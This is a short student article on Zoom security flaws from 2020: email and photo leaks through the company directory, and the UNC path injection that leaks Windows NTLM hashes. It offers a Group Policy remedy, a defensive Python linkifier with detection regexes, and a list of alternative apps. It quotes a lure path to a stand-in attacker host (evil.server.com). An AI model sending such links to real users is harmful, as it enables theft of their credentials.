IS THE ZOOM APP SAFE ENOUGH???

Article by Arul Dharshan for IEEE-SPS, VIT

Zoom video conferencing has been the most talked-about app of this lockdown, used for everything from business meetings to online classes. With lockdowns in force around the world, Zoom's popularity shot up quickly.

Email addresses, profile photos leak

Users who share the same email domain are placed in a common "company" directory that is visible to every member of it. This does not happen for addresses on major email providers like Gmail, Yahoo, Hotmail, or Outlook, but it does for users on smaller providers. Dutch Zoom users, who reportedly used ISP-provided email addresses, found that they could see other people's email addresses, usernames, and even profile photos in that company folder.

Here's how attackers could steal Windows passwords via Zoom:

When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.

But security researcher @_g0dmode found that the Zoom client also turns Windows networking Universal Naming Convention (UNC) paths into clickable links in chat messages.

Bleeping Computer demonstrated that a regular URL and the UNC path \\evil.server.com\images\cat.jpg were both converted into clickable links in a chat message.

The problem with this, according to Bleeping Computer, is: "When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file-sharing protocol to open the remote cat.jpg file."

At the same time, by default, Windows sends the user's login name and NTLM password hash along with that connection. An attacker can crack this fairly easily to reveal the password.

Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.
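To show the defect from the fixing side, here is an added illustration (not Zoom's code, with hypothetical function names) of a minimal chat linkifier that turns only http(s) URLs into hyperlinks and leaves UNC paths and file: URIs as inert text, plus a check a chat moderation or logging pipeline could use to flag such paths. The sample messages are constructed.

```python
import html
import re

# Only http(s) URLs are eligible to become links.
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
# UNC path: two backslashes, a host, a backslash, then the share/path.
UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\s]+")
# file: URIs can reach SMB shares too, so treat them the same way.
FILE_URI_RE = re.compile(r"file:(//)?[^\s<>\"']+", re.IGNORECASE)


def find_remote_path_lures(message: str) -> list:
    """Return UNC paths and file: URIs found in a message (for alerting/logging)."""
    return UNC_RE.findall(message) + FILE_URI_RE.findall(message) if False else \
        [m.group(0) for m in UNC_RE.finditer(message)] + \
        [m.group(0) for m in FILE_URI_RE.finditer(message)]


def linkify(message: str) -> str:
    """HTML-escape a chat message and wrap only http(s) URLs in <a> tags.

    Anything that is not an http(s) URL, including \\\\host\\share paths,
    is emitted as escaped plain text, so clicking cannot trigger an SMB
    connection to an attacker-controlled host.
    """
    out = []
    pos = 0
    for m in URL_RE.finditer(message):
        out.append(html.escape(message[pos:m.start()]))
        url = m.group(0)
        out.append('<a href="%s">%s</a>' % (html.escape(url, quote=True),
                                            html.escape(url)))
        pos = m.end()
    out.append(html.escape(message[pos:]))
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample chat message mirroring the page's example.
    msg = r"see http://example.com and \\evil.server.com\images\cat.jpg"
    print(linkify(msg))
    print(find_remote_path_lures(msg))
```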

Remedy Until Zoom makes a fix

The issue needs to be fixed by Zoom, but until then you can enable a Group Policy setting that prevents NTLM credentials from being sent automatically as described. Open the Group Policy editor, find the setting below, and change it to "Deny All."

Go to Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers.

ALTERNATIVE CONFERENCING APPS FOR USERS:

Cisco Webex Meetings

Cisco is offering free access to its Webex Meetings in all countries where it is available to support the work from home needs during the coronavirus outbreak.

Skype Meet Now

Microsoft recently launched Skype Meet Now, which serves as an alternative to Zoom. It works without requiring an account and supports up to 50 participants — all for free.

Microsoft Teams

If you want more than just video calls, look at Microsoft Teams. It is also available for free during the pandemic. The free version includes unlimited chat and search, group and one-on-one audio, and video calling.

Google Hangouts

You can make video calls with up to 10 participants or chat with up to 150 participants at once. Google also lets you host video calls or message your colleagues from a mobile device.
